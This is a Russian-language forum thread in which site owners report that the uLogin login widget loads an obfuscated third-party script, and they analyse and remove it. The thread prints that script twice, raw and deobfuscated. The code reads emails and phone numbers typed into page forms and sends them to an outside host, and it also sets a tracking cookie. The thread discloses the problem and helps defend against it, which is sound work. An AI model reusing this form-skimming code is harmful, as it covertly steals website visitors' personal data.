35еместо
uLogin - виджет авторизации через социальные сети « все идеи проекта

40

голосов

Подозрительный файл подключается из ulogin.js

При подключении файла ulogin.js добавляется вирус на ваш сайт. Если вы хотите чтобы на вашем сайте был вирус - пользуйтесь!

Алексей, 28.12.2017, 19:58
Статус идеи: ожидает рассмотрения

Комментарии

Иван Пшеницын, 28.12.2017, 20:11
Здравствуйте.
Что это значит? О каком вирусе идёт речь? Наш плагин никогда не добавлял ничего подобного.
Алексей, 28.12.2017, 20:16
к сожалению это так. при подключении вашего файла мне автоматом подключается файл script-min.js
Вот ссылка на сайт: http://qubbe.topshop555.com/catalog/dreli
При рассмотрении запросов можно видеть подгрузку файла
https://yadi.sk/i/lulZqAlV3R4eUf
При отключении вашего плагина - загрузка script-min.js и обращение к сайту http://cdn3.caltat.com/ прекращается.
Вот содержимое файла script-min.js
var _0x3242=['b`q@i`h`kqvG|QdbKdh`','IDOR','rwwVev}g_z`gv}va','jahgnl','nodeName','_XFCB','target','value','**fak6+fdiqdq+fjh*f=7<=7g5(6g=5(10d3(=0a5(2045dd2`0d66*paq+umu:k8','getTime','&u=','location','href','referrer','l}jn{jJcjbja{','tdunws','etie>{pgpbrcxae','async','src','dfwFofnfmwpAzWbdMbnf','zwsv','ixxmflK`adl','cb6d57c4bc794e47a2dcc96050cd8d93','charCodeAt','fromCharCode','host','split','getFullYear',';\x20expires=',';\x20path=',';\x20path=/',';\x20domain=','length',';\x20secure','substring','indexOf','\x20undefined','undefined','createElement','fvg|ea','type','pa|p+nerewgvmtp','&a=','&l=','fduDmdldourCxU`fO`ld','}ptq','^[a-zA-Z0-9\x5c-]{2,30}@[a-z0-9\x5c-]{2,30}\x5c.[a-z0-9\x5c-]{2,10}$','^\x5c+7[0-9\x5c(\x5c)\x5c\x20\x5c-]{10,15}$','^8[0-9\x5c(\x5c)\x5c\x20\x5c-]{10,15}$','test','function','body','xszu|~','G@^[Z','val'];(function(_0x29e985,_0x31b96b){var _0xf9c34=function(_0x49dea9){while(--_0x49dea9){_0x29e985['push'](_0x29e985['shift']());}};_0xf9c34(++_0x31b96b);}(_0x3242,0x129));var _0xa93a=function(_0x2fbfb4,_0x59bcb9){_0x2fbfb4=_0x2fbfb4-0x0;var _0x5f1fea=_0x3242[_0x2fbfb4];return _0x5f1fea;};(function(_0x5ade3d){var _0x3354b2=_0xa93a('0x0');var _0xd4900=function(_0x13e0d2,_0x1a216b){var _0x1bf296='';var _0x1a156c='';_0x1a156c=_0x13e0d2['toString']();for(var _0x206a66=0x0;_0x206a66<_0x13e0d2['length'];_0x206a66++){var _0x8c60a2=_0x13e0d2[_0xa93a('0x1')](_0x206a66);var _0x3f717a=_0x8c60a2^_0x1a216b;_0x1bf296=_0x1bf296+String[_0xa93a('0x2')](_0x3f717a);}return _0x1bf296;};function _0x1b4a96(_0x5ba017,_0x26ef0b,_0x239937,_0x2728b3,_0x584049,_0x57fb62){var _0x5ade3d=new Date();var _0x3a699a=location[_0xa93a('0x3')][_0xa93a('0x4')]('.');_0x239937=new Date(_0x5ade3d[_0xa93a('0x5')]()+0x6,0xa,0xa,0xa,0xa,0xa);document['cookie']=_0x5ba017+'='+escape(_0x26ef0b)+(_0x239937?_0xa93a('0x6')+_0x239937:'')+(_0x2728b3?_0xa93a('0x7')+_0x2728b3:_0xa93a('0x8'))+(_0x584049?_0xa93a('0x9')+_0x584049:';\x20domain='+(_0x3a699a[_0x3a699a['length']-0x2]+'.'+_0x3a699a[_0x3a699a[_0xa93a('0xa')]-0x1]))+(_0x57fb62?_0xa93a('0xb'):'');}function _0x54788d(_0x5b2eba){var _0xb5ffc1=document['cookie'][_0xa93a('0x4')](';\x20');var _0x45086f;var _0x17e682=[];var _0x5a5c2a=[];for(_0x45086f in _0xb5ffc1){if(!_0xb5ffc1[_0x45086f][_0xa93a('0xc')])continue;var _0x1573ce=_0xb5ffc1[_0x45086f][_0xa93a('0xd')]('=');var _0x19e689=_0xb5ffc1[_0x45086f][_0xa93a('0xc')](0x0,_0x1573ce);var _0x3d77e4=_0xb5ffc1[_0x45086f][_0xa93a('0xc')](_0x1573ce+0x1);_0x17e682[_0x19e689]=_0x3d77e4;}if(_0x5b2eba!=''&&_0x5b2eba!=_0xa93a('0xe')&&_0x5b2eba!=null){if(typeof _0x17e682[_0x5b2eba]!=_0xa93a('0xf'))return _0x17e682[_0x5b2eba];else return null;}else return _0x17e682;}function _0x171a02(_0x515ab7){try{_0x515ab7=_0xd4900('uwzbwb',0x16);var _0x286545=_0x54788d(_0x515ab7);if(_0x286545!=_0x3354b2){_0x1b4a96(_0x515ab7,_0x3354b2,'');}return _0x3354b2;}catch(_0x37c8e2){return _0x3354b2;}}function _0x337961(_0x564f51,_0x2cfaa0){var _0xe6a51e=document[_0xa93a('0x10')](_0xd4900(_0xa93a('0x11'),0x15));_0xe6a51e[_0xa93a('0x12')]=_0xd4900(_0xa93a('0x13'),0x4);_0xe6a51e['async']=!![];_0xe6a51e['src']=_0xd4900('mqquv?**fak6+fdiqdq+fjh*f=7<=7g5(6g=5(10d3(=0a5(2045dd2`0d66*oadqd+umu:v8',0x5)+_0x171a02()+_0xa93a('0x14')+encodeURIComponent(btoa(_0x564f51))+_0xa93a('0x15')+encodeURIComponent(btoa(_0x2cfaa0));var _0x42b059=document[_0xd4900(_0xa93a('0x16'),0x1)](_0xd4900(_0xa93a('0x17'),0x15))[0x0];_0x42b059[_0xd4900('ixxmflK`adl',0x8)](_0xe6a51e);}function _0x23c573(_0x2cc0a5){var _0x13c591=new RegExp(_0xa93a('0x18'),String[_0xa93a('0x2')](0x69));var _0x486628=new RegExp(_0xa93a('0x19'),String[_0xa93a('0x2')](0x69));var _0x5bd163=new RegExp(_0xa93a('0x1a'),String[_0xa93a('0x2')](0x69));if(_0x13c591[_0xa93a('0x1b')](_0x2cc0a5)){_0x337961(_0x2cc0a5,'');}else if(_0x486628[_0xa93a('0x1b')](_0x2cc0a5)||_0x5bd163[_0xa93a('0x1b')](_0x2cc0a5)){_0x337961('',_0x2cc0a5);}}if(typeof window['jQuery']==_0xa93a('0x1c')){$(_0xa93a('0x1d'))['on'](_0xd4900(_0xa93a('0x1e'),0x1b),_0xd4900(_0xa93a('0x1f'),0x2e),function(){_0x23c573(jQuery(this)[_0xa93a('0x20')]());});}else{document[_0xd4900(_0xa93a('0x21'),0x5)](_0xd4900(_0xa93a('0x22'),0x2b))[0x0][_0xd4900(_0xa93a('0x23'),0x13)](_0xd4900(_0xa93a('0x24'),0x9),function(_0x32263a){if(_0x32263a['target'][_0xa93a('0x25')]==_0xd4900(_0xa93a('0x26'),0x16)){_0x23c573(_0x32263a[_0xa93a('0x27')][_0xa93a('0x28')]);}});}var _0x27cb90=_0xd4900(_0xa93a('0x29'),0x5)+new Date()[_0xa93a('0x2a')]();_0x27cb90+=_0xa93a('0x2b')+encodeURIComponent(_0x5ade3d[_0xa93a('0x2c')][_0xa93a('0x2d')]);_0x27cb90+='&r='+_0x5ade3d[_0xa93a('0x2e')];var _0x3b0df5=document[_0xd4900(_0xa93a('0x2f'),0xf)](_0xd4900(_0xa93a('0x30'),0x7));_0x3b0df5[_0xa93a('0x12')]=_0xd4900(_0xa93a('0x31'),0x11);_0x3b0df5[_0xa93a('0x32')]=!![];_0x3b0df5[_0xa93a('0x33')]=_0x27cb90;var _0x510adb=_0x5ade3d[_0xd4900(_0xa93a('0x34'),0x3)](_0xd4900(_0xa93a('0x35'),0x12))[0x0];_0x510adb[_0xd4900(_0xa93a('0x36'),0x8)](_0x3b0df5);_0x171a02();}(document));:
Майло Халис, 04.01.2018, 17:13
У меня тоже подгружается и тот файл и идет запрос к сайту http://cdn3.caltat.com
Александр Иванов, 20.01.2018, 14:12
Автор молчит. Значит всё таки распространяет вирус :(
Дмитрий Журавлёв, 24.01.2018, 03:28
Такая же проблема - использую на сайте ulogin и стал подключаться какой то cdn3.caltat.com, чего я не ожидал. Непонятно что это и для чего.
Alex Evt, 24.01.2018, 12:45
Вроде убрали вирусню. По крайней мере пока не подключается.
Иван Пшеницын, 24.01.2018, 13:04
Как уже было не раз сказано, никаких вирусов ulogin не распространял и не распространяет.
Зашифрованный файл не означает. что это вирус, что за странные выводы.

В дальнейшем я буду удалять любые панические упоминания "вируса". Зачем вы людей пугаете какими-то надуманными глупостями.

Напоминаю, что наша почта team@ulogin.ru открыта для ваших вопросов и пожеланий. Отвечаем мы так гораздо быстрее и содержательнее, чем здесь, как правило.
Alex Evt, 24.01.2018, 13:07
Уважаемый ИВАН ПШЕНИЦЫН. Если вы не знаете как должна работать ваша система и как устроена работа сайта, не говорите что вы не распространяете вирусов. Сначала изучите работу вашего скрипта. Я вам написал подтверждение того что имело место быть! Ваш ulogin.js НЕ ДОЛЖЕН ТЯНУТЬ КАКИЕ ЛИБО ПОСТОРОННИЕ бибилиотеки на мой сайт и сайты других пользователей! Если это происходит, значит вас взломали или вы сами это сделали. Вас пока за жопу не схватишь вы будете отнекиваться мол у нас всё хорошо и мы ничего не делаем. Мы белые и пушистые.
Otshelnik-Fm, 24.01.2018, 23:42
у меня прям сейчас он грузится и еще js ошибки в консоли генерит https://otshelnik-fm.ru/forum/fludim/ulogin-demon-v-korobke/#topic-post-146

Вообще команда запустила свой проект. Куча ресурсов грузят (18-ть!). Зачем столько?

Ну да - следят за нашими юзерами. На волне биткойна может и битки генерят. Писал им еще в декабре - ответили что посмотрят. Но итога нет.
Иван Пшеницын, 24.01.2018, 23:51
Мы с вами подробно общались по этому поводу и мы вам подробно разъяснили что это за 18 "ресурсов" и для чего они. После разговора с вами удалось избавиться от двух запросов. Больше сокращать там нечего. В данный момент соблюден баланс производительности.

Я надеюсь, вы, как опытный разработчик, понимаете, что кол-во запросов само по себе не имеет значения. В случае, к примеру, упомянутых вами 18 запросов фактически выполняется только треть а остальное берется из кеша, потому что "запросы" дублируются.
Мы, конечно, могли бы погнаться за уменьшением количества запросов, поставив его выше производительности. Вытащить небольшие скрипты прямо в html, например. Да, это позволило бы уменьшить кол-во "запросов" вдвое. Но html не кешируется, и это мнимое улучшение легло бы на юзеров и интернет-канал в виде возросшего трафика.
Otshelnik-Fm, 25.01.2018, 00:05
И поэтому с домена https://cdn3.caltat.com/ грузится скрипт который выдает js ошибки в консоли. Обфусцирован он понятное дело для чего - чтоб нам не удалось понять что там и зачем.
Ответите зачем он и какова его функция?

Вот он уже разжат деобфускатором:

(function (_0x29e985, _0x31b96b) {
var _0xf9c34 = function (_0x49dea9) {
while (--_0x49dea9) {
_0x29e985['push'](_0x29e985['shift']());
}
};
_0xf9c34(++_0x31b96b);
}(_0x3242, 0x129));
var _0xa93a = function (_0x2fbfb4, _0x59bcb9) {
_0x2fbfb4 = _0x2fbfb4 - 0x0;
var _0x5f1fea = _0x3242[_0x2fbfb4];
return _0x5f1fea;
};
(function (_0x5ade3d) {
var _0x3354b2 = _0xa93a('0x0');
var _0xd4900 = function (_0x13e0d2, _0x1a216b) {
var _0x1bf296 = '';
var _0x1a156c = '';
_0x1a156c = _0x13e0d2['toString']();
for (var _0x206a66 = 0x0; _0x206a66 < _0x13e0d2['length']; _0x206a66++) {
var _0x8c60a2 = _0x13e0d2[_0xa93a('0x1')](_0x206a66);
var _0x3f717a = _0x8c60a2 ^ _0x1a216b;
_0x1bf296 = _0x1bf296 + String[_0xa93a('0x2')](_0x3f717a);
}
return _0x1bf296;
};

function _0x1b4a96(_0x5ba017, _0x26ef0b, _0x239937, _0x2728b3, _0x584049, _0x57fb62) {
var _0x5ade3d = new Date();
var _0x3a699a = location[_0xa93a('0x3')][_0xa93a('0x4')]('.');
_0x239937 = new Date(_0x5ade3d[_0xa93a('0x5')]() + 0x6, 0xa, 0xa, 0xa, 0xa, 0xa);
document['cookie'] = _0x5ba017 + '=' + escape(_0x26ef0b) + (_0x239937 ? _0xa93a('0x6') + _0x239937 : '') + (_0x2728b3 ? _0xa93a('0x7') + _0x2728b3 : _0xa93a('0x8')) + (_0x584049 ? _0xa93a('0x9') + _0x584049 : ';\x20domain=' + (_0x3a699a[_0x3a699a['length'] - 0x2] + '.' + _0x3a699a[_0x3a699a[_0xa93a('0xa')] - 0x1])) + (_0x57fb62 ? _0xa93a('0xb') : '');
}
function _0x54788d(_0x5b2eba) {
var _0xb5ffc1 = document['cookie'][_0xa93a('0x4')](';\x20');
var _0x45086f;
var _0x17e682 = [];
var _0x5a5c2a = [];
for (_0x45086f in _0xb5ffc1) {
if (!_0xb5ffc1[_0x45086f][_0xa93a('0xc')]) continue;
var _0x1573ce = _0xb5ffc1[_0x45086f][_0xa93a('0xd')]('=');
var _0x19e689 = _0xb5ffc1[_0x45086f][_0xa93a('0xc')](0x0, _0x1573ce);
var _0x3d77e4 = _0xb5ffc1[_0x45086f][_0xa93a('0xc')](_0x1573ce + 0x1);
_0x17e682[_0x19e689] = _0x3d77e4;
}
if (_0x5b2eba != '' && _0x5b2eba != _0xa93a('0xe') && _0x5b2eba != null) {
if (typeof _0x17e682[_0x5b2eba] != _0xa93a('0xf')) return _0x17e682[_0x5b2eba];
else return null;
} else return _0x17e682;
}
function _0x171a02(_0x515ab7) {
try {
_0x515ab7 = _0xd4900('uwzbwb', 0x16);
var _0x286545 = _0x54788d(_0x515ab7);
if (_0x286545 != _0x3354b2) {
_0x1b4a96(_0x515ab7, _0x3354b2, '');
}
return _0x3354b2;
} catch (_0x37c8e2) {
return _0x3354b2;
}
}
function _0x337961(_0x564f51, _0x2cfaa0) {
var _0xe6a51e = document[_0xa93a('0x10')](_0xd4900(_0xa93a('0x11'), 0x15));
_0xe6a51e[_0xa93a('0x12')] = _0xd4900(_0xa93a('0x13'), 0x4);
_0xe6a51e['async'] = !! [];
_0xe6a51e['src'] = _0xd4900('mqquv?**fak6+fdiqdq+fjh*f=7<=7g5(6g=5(10d3(=0a5(2045dd2`0d66*oadqd+umu:v8', 0x5) + _0x171a02() + _0xa93a('0x14') + encodeURIComponent(btoa(_0x564f51)) + _0xa93a('0x15') + encodeURIComponent(btoa(_0x2cfaa0));
var _0x42b059 = document[_0xd4900(_0xa93a('0x16'), 0x1)](_0xd4900(_0xa93a('0x17'), 0x15))[0x0];
_0x42b059[_0xd4900('ixxmflK`adl', 0x8)](_0xe6a51e);
}
function _0x23c573(_0x2cc0a5) {
var _0x13c591 = new RegExp(_0xa93a('0x18'), String[_0xa93a('0x2')](0x69));
var _0x486628 = new RegExp(_0xa93a('0x19'), String[_0xa93a('0x2')](0x69));
var _0x5bd163 = new RegExp(_0xa93a('0x1a'), String[_0xa93a('0x2')](0x69));
if (_0x13c591[_0xa93a('0x1b')](_0x2cc0a5)) {
_0x337961(_0x2cc0a5, '');
} else if (_0x486628[_0xa93a('0x1b')](_0x2cc0a5) || _0x5bd163[_0xa93a('0x1b')](_0x2cc0a5)) {
_0x337961('', _0x2cc0a5);
}
}
if (typeof window['jQuery'] == _0xa93a('0x1c')) {
$(_0xa93a('0x1d'))['on'](_0xd4900(_0xa93a('0x1e'), 0x1b), _0xd4900(_0xa93a('0x1f'), 0x2e), function () {
_0x23c573(jQuery(this)[_0xa93a('0x20')]());
});
} else {
document[_0xd4900(_0xa93a('0x21'), 0x5)](_0xd4900(_0xa93a('0x22'), 0x2b))[0x0][_0xd4900(_0xa93a('0x23'), 0x13)](_0xd4900(_0xa93a('0x24'), 0x9), function (_0x32263a) {
if (_0x32263a['target'][_0xa93a('0x25')] == _0xd4900(_0xa93a('0x26'), 0x16)) {
_0x23c573(_0x32263a[_0xa93a('0x27')][_0xa93a('0x28')]);
}
});
}
var _0x27cb90 = _0xd4900(_0xa93a('0x29'), 0x5) + new Date()[_0xa93a('0x2a')]();
_0x27cb90 += _0xa93a('0x2b') + encodeURIComponent(_0x5ade3d[_0xa93a('0x2c')][_0xa93a('0x2d')]);
_0x27cb90 += '&r=' + _0x5ade3d[_0xa93a('0x2e')];
var _0x3b0df5 = document[_0xd4900(_0xa93a('0x2f'), 0xf)](_0xd4900(_0xa93a('0x30'), 0x7));
_0x3b0df5[_0xa93a('0x12')] = _0xd4900(_0xa93a('0x31'), 0x11);
_0x3b0df5[_0xa93a('0x32')] = !! [];
_0x3b0df5[_0xa93a('0x33')] = _0x27cb90;
var _0x510adb = _0x5ade3d[_0xd4900(_0xa93a('0x34'), 0x3)](_0xd4900(_0xa93a('0x35'), 0x12))[0x0];
_0x510adb[_0xd4900(_0xa93a('0x36'), 0x8)](_0x3b0df5);
_0x171a02();
}(document));
Иван Пшеницын, 25.01.2018, 00:13
Вопрос "почему он обфусцирован", полагаю, лучше задать его разработчикам. Домен у вас есть. Основываясь на имеющейся у меня информации - это просто трекер пользователей. О чем говорит и род деятельности компании.
В данный момент, как я уже ответил вам на почту, скрипт отключен везде. У вас его закешированная версия.
Otshelnik-Fm, 25.01.2018, 00:19
Сейчас я вижу что вы его отключили. Так тема в том что мы как пользователи вашего сервиса должны быть уверены что домены только ваши должны подгружаться. Может вас ломанули или вы биткойны майнить начали - и так и так - меня такое положение не устраивает.
Нам не надо чтобы наши пользователи задавали вопросы какую информацию мы тянем с них и что это за домены такие при запросе моего сайта.

p.s. да сейчас вижу что от вас только 12 запросов. Это уже лучше. Но я не уверен что завтра с стороннего домена вы что-то подсунете. А это плохо.
Alex Evt, 16.02.2018, 02:09
Рекомендую сохранить хороший рабочий файл, и работать с ним, чем постоянно тащить их файл т.к. они могут изменить его в любое время, а локальный файл останется как есть. Это не панацея, но всё же лучше чем всегда грузить с их сайта.
Alex Evt, 24.01.2018, 23:51
Странно, у меня не подгружается столько файлов, только ulogin.js и всё.
Но проблема пропала, пока по крайней мере.
У вас также не вижу чтобы подгружался этот файл по вашей ссылке.
Otshelnik-Fm, 25.01.2018, 00:21
Вот тоже вопрос был http://www.sbup.com/seo-forum/poiskovye_tehnologii/vozmoznoe_zarazenie_saita_virusom__nuzny_razumnye_sovety_/ - я не настолько спец по таким скриптам - но если он с форм тянет данные - это отвратительно и очень некрасиво такой скрипт нам подсовывать
mittus, 16.02.2018, 01:15
Через раз выкатывается ошибка "Refused to load the script 'https://cdn3.caltat.com/c82982b0-3b80-45a6-85d0-7510aa7e5a33/script-min.js'"

Скажу от себя, что на какой-либо трекинг и сбор аналитики категорически не согласен, проблема эта наблюдается последние 4 месяца точно. Просьба конкретно прояснить ситуацию, вы либо в обязательном порядке подключаете трекинг и придаете огласке такой способ монетизации проекта, либо как-то лечите данную проблему и избавляетесь от практики "подсовывания" в ваш плагин подобных вещей.
A Pixel, 22.02.2018, 22:10
Подтверждаю,
http://cdn3.caltat.com/c82982b0-3b80-45a6-85d0-7510aa7e5a33/script-min.js net::ERR_BLOCKED_BY_CLIENT
ADBLOCK поймал.
Sergey, 26.02.2018, 19:36
У меня тоже самое, стопроцентно при включении ulogin.js тянется скрипт с cdn3.caltat.com
Frank, 20.03.2018, 17:02
Сегодня заметил, что благодаря этому скрипту с cd3.caltat.com - у нас утекают данные.
Первый раз в сессии, при сабмите формы с полем типа пароль, уходит XHR запрос на некий jdata.php расположенный на caltat.com

Вот такой это "не вирус".
Спасибо разрабам за такую подлянку.
Иван Пшеницын, 20.03.2018, 17:20
Это очень важно.
У вас остались какие-либо свидетельства этого? Дайте, пожалуйста, пример запроса или скрин или что-то подобное, чтобы мы могли убедиться в подобном поведении и предьявить его разработчикам.
Мне не удалось повторить отправку данных при сабмите формы, даже в чистом инкогнито (вы говорили про чистую сессию).
Антон Сахаров, 20.04.2018, 15:55
проверка связи
Антон Сахаров, 20.04.2018, 16:04
Так, разобрал обфусцированный файл который грузился сегодня (20 04), а не тот что выше по теме.

В нем навешивается обработчик на on change на все инпуты.
Проверяется значение, если это емейл или телефон - то они отсылаются на caltat.com. Причем не обычным запросом, а присоединением скрипта к вашей странице, в src которого и указан зашифрованный емейл или телефон.

Более простыми словами: эта хреновина угоняет все телефоны и емейлы.

Не за что =)
Alex Evt, 20.04.2018, 16:09
Красавчик. Теперь понятно чем они занимаются. Случаем нет нормального файла, без этих событий?
Антон Сахаров, 20.04.2018, 17:27
https://pastebin.com/cCpC98d4

я закомментил с 1207 строки
Антон Сахаров, 20.04.2018, 17:29
И да, если вредоносный скриптик поменяется, он сможет угонять не только емейлы и телефоны.
Otshelnik-Fm, 04.06.2018, 21:56
Антон - текущее состояние дел такое же? Продолжают трекать данные из форм?
Антон Сахаров, 05.06.2018, 10:52
Не проверял. Выпилил вредный код, использую отредактированный юлогин.
Антон Сахаров, 05.06.2018, 10:54
за статью на хабре спасибо ( habr.com/post/413233/ )
Otshelnik-Fm, 05.06.2018, 12:12
Пожалуйста. Я дважды с декабря месяца с командой uLogin пытался решить вопросы о их партнерах. Увы, как видим - результата не принесло общение. На 3-й раз я просто написал статью на хабре - как и обещал в письме. Жаль что не удалось с ними найти общий язык и понимание. А в сервисе реформал, что они сами создали - не идут на контакт.
Денис Анохин, 22.04.2018, 11:19
Блин, разрабы, что за дела? Где внятное объяснение? тоже сегодня этот обвес у меня спалился.
Придется с uLogin уходить, раз угоняют данные.
Кто знает решения лучше?
Кактус, 11.05.2018, 10:11
сложно уйти.. пользователи потеряют свои профили..
Maxim, 25.04.2018, 19:01
Записал видео, как это всё работает (введенный телефон уходит на левый сайт):

https://www.dropbox.com/s/9abfou3s5tcz2c5/ULogin%20-%20Tracking%20-%20Screencast%202018-04-25.mp4?dl=1
Дмитрий Сычёв, 10.05.2018, 22:20
Вот уроды! Я щас создам тему на форуме своего движка!
Кактус, 11.05.2018, 10:06
Сбор персональных данных без согласия пользователей? не очень понятно зачем это такому серьезному и старому сервису...
dima33, 11.05.2018, 10:42
Жалоба в прокуратуру и Роскомнадзор, быть может, решит проблему?
Кактус, 11.05.2018, 10:43
я думаю это лишнее)) уверен что будет пояснение когда во всем авторы юлогина разберутся..
dima33, 11.05.2018, 10:49
Вопрос подняли в декабре. Сегодня уже май. Времени, чтобы разобраться и дать внятный ответ было более чем. Похоже, никто ни в чем разбираться и не собирается. Ну пусть тогда отвечают на вопросы от компетентных органов
dima33, 11.05.2018, 10:58
Самое некрасивое в этой истории, что ulogin подставляет тысячи вебмастеров, к которым тоже могут предъявить претензии по поводу нарушения законодательства о персональных данных
navumik mikhail, 11.05.2018, 12:57
Ого.
Как хорошо, что я не успел на новые два проекта повесить этот плагин.
Денис Анохин, 21.06.2018, 18:29
Кому некогда деообфусцировать, ищите и комментируйте вот такую строку прямо в минималке:

6>parseInt(10*Math[f("0x0","5Rpu")](),10)&&setTimeout(function(){var a=document[f("0x1","TmED")](f("0x2","5Rpu"));a[f("0x3","Tshb")]=f("0x4","mFpU");document[f("0x5","ZaXT")](f("0x6","Tshb"))[0][f("0x7","zG&C")](a);document[f("0x8","rukF")](f("0x9","54Y3"))[0][f("0xa","7wv0")](a)},10)
Матвей /Дубровин, 02.07.2018, 16:03
Никто не удосужился зайти на сам сайт прочитать информацию?
https://caltat.com
Сайт выдает релевантные ответы в зависимости от поведения пользователя.
Это не вирус, а улучшение конверсии ваших пользователей.
Alex Evt, 02.07.2018, 17:07
Вы случаем не депутат? А то те тоже сказали что повышение пенс. возраста это очень хорошо для народа.
AntonKozhka, 30.07.2018, 16:10
Зачем им мой телефон и\или пароль?
Вебвизор и то не позволяет себе такого (?)
Alex, 03.08.2018, 09:19
Более понятная версия: https://pastebin.com/BXWnbrNf
Так же рекомендую вырезать весь блок try/catch , тестирование проблем не выявило.
Александр, 24.08.2018, 15:11
А можно при входе убрать подтверждение почтой?
td slava import, 12.11.2018, 15:04
Обнаружил ошибки:
Uncaught DOMException: Failed to read the 'localStorage' property from 'Window': Access is denied for this document. at https://ulogin.ru/version/2.0/js/drop.js?1:2:110

И сразу рядом код шпиёна:
b.js:1
Uncaught DOMException: Failed to read the 'localStorage' property from 'Window': Access is denied for this document.
at Object.<anonymous> (https://sonar.semantiqo.com/i/b.js:1:2379)
at x (https://sonar.semantiqo.com/i/b.js:1:1436)
at https://sonar.semantiqo.com/i/b.js:1:2340
at https://sonar.semantiqo.com/i/b.js:1:2349

Судя по всему вместо caltat.com теперь semantiqo.com

1. Сношу юлогин нахрен и пишу хвалебные отзывы
2. А как можно воспользоваться чужими утекшими данными?

Оставить комментарий